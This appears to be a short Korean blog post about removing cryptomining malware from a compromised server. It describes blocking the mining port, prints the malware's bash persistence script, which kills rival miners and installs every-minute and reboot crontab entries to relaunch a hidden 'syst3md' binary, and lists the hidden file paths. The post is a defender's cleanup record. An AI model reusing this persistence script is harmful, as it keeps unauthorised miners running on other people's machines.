마이닝 해킹

 

프로세스 파악은 기본이니 생략

파악 되었으면, 포트 확인하고, 네트워크 포트 부터 막는다.

 

경험상 web을 통해 소스를 받고, ps가 죽으면 web에서 다시 소스를 받아서 설치하거나, 소스 삭제를 못 하게 해놓는다.

당장 마이닝허브 포트 부터 차단하면 로드 상승은 멈추게 된다.

다시 시작 및 체크는 cron으로 돌리는 것이고 cron도 삭제를 못 하게 해놓았다.

돌리는 소스를 최종적으로 파악 한 내용은 아래와 같다.

#!/bin/bash  sleeptime=5  killminers() {     pkill obama1     pkill playstation  

  pkill xmrig ?pkill java     pkill cnrig }  hook1location=`cat /var/tmp/.apachee/.hook1location` apachelogslocation=`cat /var/tmp/.apachee/.apachelogslocation` 

while : do ?killminers  ?if ! crontab -l | grep -q 'cronstart'; ?then ?

?rm -rf .tempo ??echo "* * * * * ${hook1location} > /dev/null <&1 2>&1 & disown" >> .tempo ??sleep 1 ??echo "@monthly ${hook1location} > /dev/null <&1 2>&1 &

 disown" >> .tempo ??sleep 1 ??echo "@reboot ${apachelogslocation} > /dev/null <&1 2>&1 & disown" >> .tempo ??crontab .tempo ??rm -rf .tempo ?fi ? ?if !

 pgrep -x syst3md > /dev/null ?then ??$hook1location > /dev/null <&1 2>&1 &

 disown ?fi  ?sleep $sleeptime done  ./apachelogs

 

/var/tmp/.apachee
/usr/bin/.ICE-unix/.k/.auth/syst3md
/tmp/.ICE-unix/.k/.auth/syst3md

 

다 찾아서 없앴다.

ㅋㅋ

 

댐벼라~